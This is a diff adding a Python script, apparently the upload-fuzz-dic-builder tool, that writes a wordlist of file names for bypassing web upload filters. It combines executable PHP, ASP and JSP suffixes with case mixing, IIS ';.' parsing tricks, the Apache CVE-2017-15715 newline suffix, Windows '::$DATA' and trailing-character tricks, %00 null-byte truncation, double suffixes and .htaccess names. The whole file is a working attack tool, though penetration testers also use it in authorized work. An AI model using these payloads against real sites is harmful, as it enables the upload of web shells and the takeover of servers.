|
| 1 | +#coding=utf-8 |
| 2 | +''' |
| 3 | +author: c0ny1<root@gv7.me> |
| 4 | +github: https://github.com/c0ny1/upload-fuzz-dic-builder |
| 5 | +date: 2018-11-04 23:16 |
| 6 | +description: 生成符合漏洞实际场景fuzz字典的脚本 |
| 7 | +''' |
| 8 | + |
| 9 | +import argparse |
| 10 | +import copy |
| 11 | +import urllib |
| 12 | + |
| 13 | +## 各类语言可解析的后缀 |
| 14 | +html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml'] |
| 15 | +asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr'] |
| 16 | +php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2'] |
| 17 | +jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml'] |
| 18 | + |
| 19 | + |
| 20 | +## web中间件解析漏洞 |
| 21 | +def iis_suffix_creater(suffix): |
| 22 | + res = [] |
| 23 | + for l in suffix: |
| 24 | + str ='%s;.%s' % (l,allow_suffix) |
| 25 | + res.append(str) |
| 26 | + return res |
| 27 | + |
| 28 | +def apache_suffix_creater(suffix): |
| 29 | + res = [] |
| 30 | + for l in suffix: |
| 31 | + str = '%s.xxx' % l |
| 32 | + res.append(str) |
| 33 | + str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715 |
| 34 | + res.append(str) |
| 35 | + return res |
| 36 | + |
| 37 | +win_tomcat = ['%20','::$DATA','/'] |
| 38 | +def tomcat_suffix_creater(suffix): |
| 39 | + res = [] |
| 40 | + for l in suffix: |
| 41 | + for t in win_tomcat: |
| 42 | + str = '%s%s' % (l,t) |
| 43 | + res.append(str) |
| 44 | + return res |
| 45 | + |
| 46 | +## 系统特性 |
| 47 | +def str_81_to_ff(): |
| 48 | + res = [] |
| 49 | + for i in range(129,256): |
| 50 | + str = '%x' % i |
| 51 | + str = '%' + str |
| 52 | + str = urllib.unquote(str) |
| 53 | + res.append(str) |
| 54 | + return res |
| 55 | + |
| 56 | +windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff() |
| 57 | + |
| 58 | +def windows_suffix_creater(suffix): |
| 59 | + res = [] |
| 60 | + for s in suffix: |
| 61 | + for w in windows_os: |
| 62 | + str = '%s%s' % (s,w) |
| 63 | + res.append(str) |
| 64 | + return res |
| 65 | + |
| 66 | +## 脚本语言漏洞(00截断) |
| 67 | +def str_00_truncation(suffix,allow_suffix): |
| 68 | + res = [] |
| 69 | + for i in suffix: |
| 70 | + str = '%s%s.%s' % (i,'%00',allow_suffix) |
| 71 | + res.append(str) |
| 72 | + str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix) |
| 73 | + res.append(str) |
| 74 | + return res |
| 75 | + |
| 76 | +## 返回字符串所有大写可能 |
| 77 | +def str_case_mixing(word): |
| 78 | + str_list = [] |
| 79 | + word = word.lower() |
| 80 | + tempWord = copy.deepcopy(word) |
| 81 | + plist = [] |
| 82 | + redict = {} |
| 83 | + for char in range( len( tempWord ) ): |
| 84 | + char = word[char] |
| 85 | + plist.append(char) |
| 86 | + num = len( plist ) |
| 87 | + for i in range( num ): |
| 88 | + for j in range( i , num + 1 ): |
| 89 | + sContent = ''.join( plist[0:i] ) |
| 90 | + mContent = ''.join( plist[i:j] ) |
| 91 | + mContent = mContent.upper() |
| 92 | + eContent = ''.join( plist[j:] ) |
| 93 | + content = '''%s%s%s''' % (sContent,mContent,eContent) |
| 94 | + redict[content] = None |
| 95 | + |
| 96 | + for i in redict.keys(): |
| 97 | + str_list.append(i) |
| 98 | + |
| 99 | + return str_list |
| 100 | + |
| 101 | +## list大小写混合 |
| 102 | +def list_case_mixing(li): |
| 103 | + res = [] |
| 104 | + for l in li: |
| 105 | + res += str_case_mixing(l) |
| 106 | + return res |
| 107 | + |
| 108 | +## 双后缀生成 |
| 109 | +def str_double_suffix_creater(suffix): |
| 110 | + res = [] |
| 111 | + for i in range(1,len(suffix)): |
| 112 | + str = list(suffix) |
| 113 | + str.insert(i,suffix) |
| 114 | + res.append("".join(str)) |
| 115 | + return res |
| 116 | + |
| 117 | +def list_double_suffix_creater(list_suffix): |
| 118 | + res = [] |
| 119 | + for l in list_suffix: |
| 120 | + res += str_double_suffix_creater(l) |
| 121 | + return duplicate_removal(res) |
| 122 | + |
| 123 | +#list 去重 |
| 124 | +def duplicate_removal(li): |
| 125 | + return list(set(li)) |
| 126 | + |
| 127 | +#list 去空行 |
| 128 | +def clear_list(li): |
| 129 | + rmstr = ['',' ',None] |
| 130 | + for l in li: |
| 131 | + for r in rmstr: |
| 132 | + if l == r: |
| 133 | + li.remove(r) |
| 134 | + return li |
| 135 | + |
| 136 | +def parse_args(): |
| 137 | + parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder', |
| 138 | + formatter_class=argparse.RawTextHelpFormatter, |
| 139 | + description='') |
| 140 | + |
| 141 | + parser.add_argument('-n','--upload-filename',metavar='',dest='upload_file_name', type=str, default='test', |
| 142 | + help=u'Upload file name') |
| 143 | + |
| 144 | + parser.add_argument('-a','--allow-suffix',metavar='',dest='allow_suffix', type=str, default='jpg', |
| 145 | + help=u'Allowable upload suffix') |
| 146 | + |
| 147 | + parser.add_argument('-l','--language',metavar='',dest='language',choices=['asp','php','jsp','all'], type=str, default='all', |
| 148 | + help='Uploaded script language') |
| 149 | + |
| 150 | + parser.add_argument('-m','--middleware',metavar='',dest='middleware',choices=['iis','apache','tomcat','all'],type=str, default='all', |
| 151 | + help='Middleware used in Web System') |
| 152 | + parser.add_argument('--os',metavar='',dest='os', choices=['win','linux','all'],type=str, default='all', |
| 153 | + help='Target operating system type') |
| 154 | + |
| 155 | + parser.add_argument('-d','--double-suffix',dest='double_suffix', default=False,action='store_true', |
| 156 | + help='Is it possible to generate double suffix?') |
| 157 | + parser.add_argument('-o','--output',metavar='',dest='output_filename', type=str, default='upload_fuzz_dic.txt', |
| 158 | + help='Output file') |
| 159 | + |
| 160 | + args = parser.parse_args() |
| 161 | + return args |
| 162 | + |
| 163 | +if __name__ == '__main__': |
| 164 | + |
| 165 | + args = parse_args() |
| 166 | + upload_file_name = args.upload_file_name |
| 167 | + allow_suffix = args.allow_suffix |
| 168 | + output_filename =args.output_filename |
| 169 | + |
| 170 | + language = args.language |
| 171 | + middleware = args.middleware |
| 172 | + os = args.os |
| 173 | + double_suffix =args.double_suffix |
| 174 | + |
| 175 | + if middleware == 'iis': |
| 176 | + os = 'win' |
| 177 | + |
| 178 | + ################################### |
| 179 | + |
| 180 | + f = open(output_filename,'w') |
| 181 | + parse_suffix = [] |
| 182 | + case_parse_suffix = [] |
| 183 | + middleware_parse_suffix = [] |
| 184 | + htaccess_suffix = [] |
| 185 | + os_parse_suffix = [] |
| 186 | + double_parse_suffix = [] |
| 187 | + |
| 188 | + |
| 189 | + # 可解析后缀 |
| 190 | + if language == 'asp': |
| 191 | + html_parse_suffix = [] |
| 192 | + php_parse_suffix = [] |
| 193 | + jsp_parse_suffix = [] |
| 194 | + parse_suffix = asp_parse_suffix |
| 195 | + elif language == 'php': |
| 196 | + asp_parse_suffix = [] |
| 197 | + jsp_parse_suffix = [] |
| 198 | + parse_suffix = html_parse_suffix + php_parse_suffix |
| 199 | + elif language == 'jsp': |
| 200 | + html_parse_suffix = [] |
| 201 | + asp_parse_suffix = [] |
| 202 | + php_parse_suffix = [] |
| 203 | + parse_suffix = jsp_parse_suffix |
| 204 | + else: # language == 'all' |
| 205 | + parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix |
| 206 | + print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix) |
| 207 | + |
| 208 | + # 可解析后缀 + 大小写混合 |
| 209 | + if os == 'win' or os == 'all': |
| 210 | + case_html_parse_suffix = list_case_mixing(html_parse_suffix) |
| 211 | + case_asp_parse_suffix = list_case_mixing(asp_parse_suffix) |
| 212 | + case_php_parse_suffix = list_case_mixing(php_parse_suffix) |
| 213 | + case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix) |
| 214 | + case_parse_suffix = list_case_mixing(parse_suffix) |
| 215 | + print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix) |
| 216 | + else: # os == 'linux' |
| 217 | + case_html_parse_suffix = html_parse_suffix |
| 218 | + case_asp_parse_suffix = asp_parse_suffix |
| 219 | + case_php_parse_suffix = php_parse_suffix |
| 220 | + case_jsp_parse_suffix = jsp_parse_suffix |
| 221 | + case_parse_suffix = parse_suffix |
| 222 | + |
| 223 | + # 中间件漏洞 |
| 224 | + if middleware == 'iis': |
| 225 | + case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix |
| 226 | + middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix) |
| 227 | + elif middleware == 'apache': |
| 228 | + case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix |
| 229 | + middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix) |
| 230 | + elif middleware == 'tomcat' and os == 'linux': |
| 231 | + middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix |
| 232 | + elif middleware == 'tomcat' and (os == 'win' or os == 'all'): |
| 233 | + case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix |
| 234 | + middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix) |
| 235 | + else: |
| 236 | + case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix |
| 237 | + iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix) |
| 238 | + case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix |
| 239 | + apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix) |
| 240 | + case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix |
| 241 | + tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix) |
| 242 | + middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix |
| 243 | + |
| 244 | + middleware_parse_suffix = duplicate_removal(middleware_parse_suffix) |
| 245 | + print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix) |
| 246 | + |
| 247 | + # .htaccess |
| 248 | + if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'): |
| 249 | + htaccess_suffix = str_case_mixing(".htaccess") |
| 250 | + print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix) |
| 251 | + elif (middleware == 'apache' or middleware == 'all') and os == 'linux': |
| 252 | + htaccess_suffix = ['.htaccess'] |
| 253 | + print u'[+] 加入1条.htaccess' |
| 254 | + else: |
| 255 | + htaccess_suffix = [] |
| 256 | + |
| 257 | + # 系统特性 |
| 258 | + if os == 'win': |
| 259 | + os_parse_suffix = windows_suffix_creater(case_parse_suffix) |
| 260 | + elif os == 'linux': |
| 261 | + os_parse_suffix = parse_suffix |
| 262 | + else: |
| 263 | + win_suffix = windows_suffix_creater(case_parse_suffix) |
| 264 | + linux_suffix = parse_suffix |
| 265 | + os_parse_suffix = win_suffix + linux_suffix |
| 266 | + |
| 267 | + os_parse_suffix = duplicate_removal(os_parse_suffix) |
| 268 | + print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix) |
| 269 | + |
| 270 | + # 语言漏洞 |
| 271 | + |
| 272 | + language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix) |
| 273 | + |
| 274 | + # 双后缀 + 大小写混合 |
| 275 | + if double_suffix: |
| 276 | + double_parse_suffix = list_double_suffix_creater(case_parse_suffix) |
| 277 | + print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix) |
| 278 | + else: |
| 279 | + double_parse_suffix = [] |
| 280 | + |
| 281 | + all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix |
| 282 | + all_parse_suffix = duplicate_removal(all_parse_suffix) |
| 283 | + all_parse_suffix = clear_list(all_parse_suffix) |
| 284 | + # 写文件 |
| 285 | + num = len(all_parse_suffix) |
| 286 | + for i in all_parse_suffix: |
| 287 | + str = '%s.%s' % (upload_file_name,i) |
| 288 | + #print '[+] '+type(str) |
| 289 | + f.write(str) |
| 290 | + f.write('\n') |
| 291 | + num += len(htaccess_suffix) |
| 292 | + for i in htaccess_suffix: |
| 293 | + f.write(i) |
| 294 | + f.write('\n') |
| 295 | + f.close() |
| 296 | + print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename) |
0 commit comments